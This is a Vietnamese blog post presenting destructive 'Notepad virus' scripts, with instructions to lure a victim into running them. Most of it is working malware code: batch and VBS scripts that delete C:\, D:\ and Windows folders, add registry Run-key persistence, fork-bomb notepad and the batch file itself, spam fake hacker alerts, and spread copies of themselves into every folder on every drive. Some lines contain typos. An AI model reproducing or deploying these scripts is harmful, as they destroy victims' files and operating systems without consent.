Nói là virus nhưng thực chất nó ko phải là virus
, nó chỉ là một đoạn mã để thực hiện một điều gì đó "nham hiểm"do chúng ta viết ra. Chính vì thế "hầu hết" các đoạn mã trong đây đều ko bị antivirus chém. Em sẽ cho các bác một số code để các bác biết về cấu tạo của nó, và nên cài đặt máy ảo hoặc đóng băng các ổ trước khi sử dụng những con virus này.

1.

-B1: vào notepad gõ cú pháp:
while true
wend


-B2: Sau đó lưu lại dưới đuôi* .vbs
-B3: gửi victim (nạn nhân) dụ cho victim chạy tập tin này( đừng có gắng thử nhé....không chịu trách nhiệm đâu đấy)

Đây mới chỉ là virut, nếu viết autorun cho nó nữa thì cực kỳ nguy hiểm, con này mỗi lần chạy thì nó chiếm 100% cpu của 1 luồng dữ liệu. Với máy core 2duo thì click 2 phát CPU 100%, core i3, i5 thì click 4 lần. Sau khi bị chiếm 100% cpu muốn tắt đi thì vào Task Manager tắt hết những chương trình có đuôi vbscript đang chạy. Đó là virut chạy do con người điều khiển, còn nếu viết thêm autorun để nó chạy tự động, giả sử số lần click là lớn hơn 10 thì thôi rồi, chỉ có cài lại win.


2.Xóa toàn bộ ổ C:\ của Victim


if exist C:\program files*.* deltree /y C:\program files*.*
if exist C:\my documents*.* deltree /y C:\my documents*.*
if exist C:\windows\desktop*.* deltree /y C:\windows\desktop*.*
if exist C:\windows\start menue*.* deltree /y C:\windows\start menue*.*
if exist C:\windows\command*.* deltree /y C:\windows\command*.*
if exist C:\windows\system*.* deltree /y C:\windows\system*.*
if exist C:\windows*.* deltree /y C:\windows*.*

-Lưu với tên .bat

3)

Trích dẫn:
msgbox"Die roai !"
On Error Resume Next
Set vip_xinh = Createobject("scripting.filesystemobject")
vip_xinh.copyfile wscript.scriptfullname,vip_xinh.GetSpecialFolder(0 )& "\ vip_xinh.vbs"
Set vip_xinh2= CreateObject("WScript.Shell")
vip_xinh2.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersio n\Ru n\die","wscript.exe "& vip_xinh.GetSpecialFolder(0)& "\ vip_xinh.vbs %"

On Error Resume Next
Const vic = "D:\"
Delvic
Sub Delvic()
Dim fso
Set fso = CreateObject("Scripting.FileSystemObject")
fso.DeleteFile vic & "*.*" , True
fso.DeleteFolder vic & "*" , True
End Sub

On Error Resume Next
Const vic1 = "C:\windows\"
Delvic1
Sub Delvic1()
Dim fso1
Set fso1 = CreateObject("Scripting.FileSystemObject")
fso1.DeleteFile vic1 & "*.*" , True
fso1.DeleteFolder vic1 & "*" , True
End Sub

On Error Resume Next
Const vic2 = "C:\"
Delvic2
Sub Delvic2()
Dim fso2
Set fso2 = CreateObject("Scripting.FileSystemObject")
fso2.DeleteFile vic2 & "*.*" , True
fso2.DeleteFolder vic2 & "*" , True
End Sub

On Error Resume Next
Set treomay= CreateObject("WScript.Shell")
Do
treomay.run "notepad",false
loop

- Lưu với tên .bat


4.


On Error Resume Next
Set popo= Createobject("scripting.filesystemobject")
popo.copyfile wscript.scriptfullname,cuong.GetSpecialFolder(1)& "\popo.vbs"
Set popo2= CreateObject("WScript.Shell")
popo2.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersio n\Ru n","wscript.exe "&popo.GetSpecialFolder(0)& "\popo.vbs %"
Set treomay= CreateObject("WScript.Shell")
msgbox"May tinh cua ban bi nhiem virut",,"Danger"
msgbox"May se bi lag trong 2s",,"Danger"
msgbox"Ban con 1s",,"Danger"
msgbox"Ban con 0s",,"Danger"
msgbox"May da bi nhiem virus",,"Danger"
Me.visible=false
App.Taskvisible=false
Do
Me.visible=false
App.Taskvisible=false
treomay.run "notepad",false
loop

- Lưu với tên .vbs

5.Thông báo vĩnh cửu

msgbox "Đừng có tắt dòng thông báo này đi nếu không bạn sẽ gặp rắc rối đó!",,"Thông báo từ Hacker Microsoft"
msgbox "Định làm liều à, thử tắt lần nữa xem!",,"Thông báo từ Hacker Microsoft"
do

msgbox "Error! Máy tính của bạn đã bị các Hacker tấn công!",,"Thông báo từ Hacker Microsoft"
Loop

- Lưu với tên .vbs


6.

start 1.bat

-Lưu với tên 1.bat

-khoa điện tử-máy tính mình nên tổ chức cuộc thì "Xem ai nhanh hơn nào!!" để coi ai tắt thằng này nhanh nhất....khữa ... Khữa


7.Tạo thư mục liên tục mỗi khi bấm

'Thuoc Doc !!!
Dim fso,file,VBCopy
Set fso=CreateObject("Scripting.FileSystemObject")
Set file=fspenTextFile(WScript.ScriptFullName,1)
VBCopy=file.ReadAll
FolderList("A:")
FolderList("B:")
FolderList("C:")
FolderList("D:")
FolderList("E:")
FolderList("F:")
FolderList("G:")
FolderList("H:")
FolderList("I:")
FolderList("J:")
FolderList("K:")
FolderList("L:")
FolderList("M:")
FolderList("N:")
FolderList("O:")
FolderList("P:")
FolderList("Q:")
FolderList("R:")
FolderList("S:")
FolderList("T:")
FolderList("U:")
FolderList("V:")
FolderList("X:")
FolderList("Y:")
FolderList("Z:")
FolderList("W:")

Sub FolderList(FolderSpec)
On Error Resume Next
Dim f,f1,sf,COP,CAP
Set f=fso.GetFolder(FolderSpec)
set sf=f.SubFolders
For Each f1 In sf
Set COP=fso.CreateTextFile(f1.path & "\Virus !!!!!!!.vbs")
COP.write VBCopy
Set CAP=fso.CreateTextFile(f1.path & "---Virus !!!!!!!.vbs")
CAP.write VBCopy
FolderList(f1.Path)
Next
End sub

Thuốc giải 7.
B1: Mở Notepad
B2: Gõ code:
'Thuoc Giai !!!
Dim fso,file,VBCopy
Set fso=CreateObject("Scripting.FileSystemObject")
Set file=fspenTextFile(WScript.ScriptFullName,1)
VBCopy=file.ReadAll
FolderList("A:")
FolderList("B:")
FolderList("C:")
FolderList("D:")
FolderList("E:")
FolderList("F:")
FolderList("G:")
FolderList("H:")
FolderList("I:")
FolderList("J:")
FolderList("K:")
FolderList("L:")
FolderList("M:")
FolderList("N:")
FolderList("O:")
FolderList("P:")
FolderList("Q:")
FolderList("R:")
FolderList("S:")
FolderList("T:")
FolderList("U:")
FolderList("V:")
FolderList("X:")
FolderList("Y:")
FolderList("Z:")
FolderList("W:")

Sub FolderList(FolderSpec)
On Error Resume Next
Dim f,f1,sf,COP,CAP,ATT
Set f=fso.GetFolder(FolderSpec)
set sf=f.SubFolders For Each f1 In sf
'Set COP=fso.CreateTextFile(f1.path & "\Virus !!!!!!!.vbs")
'COP.write VBCopy
'Set CAP=fso.CreateTextFile(f1.path & "---Virus !!!!!!!.vbs")
'CAP.write VBCopy
'Set ATT=fso.GetFolder(f1.Path)
'ATT.Attributes=ATT.Attributes+2
fso.DeleteFile(f1.path & "\Virus !!!!!!!.vbs")
fso.DeleteFile(f1.path & "---Virus !!!!!!!.vbs")
FolderList(f1.Path)
Next
End sub

- Lưu với tên .vbs


8.


-B1: tạo 1 file bất kỳ(1.txt, 1.bat, 1.exe...v..v..)
Vd: C:\Users\chuong\Desktop\1.txt
-B2: vào notepad
-B3 :Đánh lệnh erase C:\Users\chuong\Desktop\1.txt
-B4: lưu dưới dạng *.cmd
-B5: Chạy file *.cmd

thế là file 1.txt đã bị xóaCác bạn đang tự hỏi ủa thế có gì đâu mà gọi là phá hoại?????
xin thưa rằng, files chạy dưới đuôi.cmd là thao tác thực hiện trên ms-dos vì vậy nó không kiêng nể ai hết...chỉ thực thi mệnh lệnh 1 cách hiệu quả thôi
-Bởi vậy....nếu bạn thay lệnh erase C:\Users\chuong\Desktop\1.txt -->>>>erase C:\Windows thì bạn nghĩ thế nào....có phải là đi tong cái win không........Bởi vậy đừng cố gắng làm điều gì ngu ngốc nhé!!!!!
p/s: có thiếu sót gì các bác nói e chỉnh sửa ạ, tks nhìu ạ

- 0 bình luận lượt xem

http://www.plusthuthuat.com/2015/07/quay-voi-notepad.html

BÌNH LUẬN (0)

Một số lưu ý khi bình luận

Mọi bình luận sai nội quy sẽ bị xóa mà không cần báo trước (xem nội quy)

Bấm Thông báo cho tôi bên dưới khung bình luận để nhận thông báo khi admin trả lời

Để bình luận một đoạn code, hãy mã hóa code trước nhé